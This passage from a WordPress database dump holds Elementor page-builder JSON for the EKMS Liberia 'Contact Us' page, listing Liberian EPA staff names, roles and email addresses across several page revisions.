Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14736,2337,'_elementor_edit_mode','builder'),(14737,2337,'_elementor_template_type','wp-page'),(14738,2337,'_elementor_version','2.7.5'),(14739,2337,'_wp_page_template','default'),(14740,2337,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer<br>\\n\\nUNCBD Focal Point\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong>\\n<br>\\nMEAs Coordinator\\n<br>\\nUNFCCC Focal Point\\n<br>\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\n\\nGIS Coordinator<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong><br>\\n\\nCoordinator Climate Change Secretariat<br>\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\\n\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(14742,2338,'_elementor_edit_mode','builder'),(14743,2338,'_elementor_template_type','wp-page'),(14744,2338,'_elementor_version','2.7.5'),(14745,2338,'_wp_page_template','default'),(14746,2338,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"j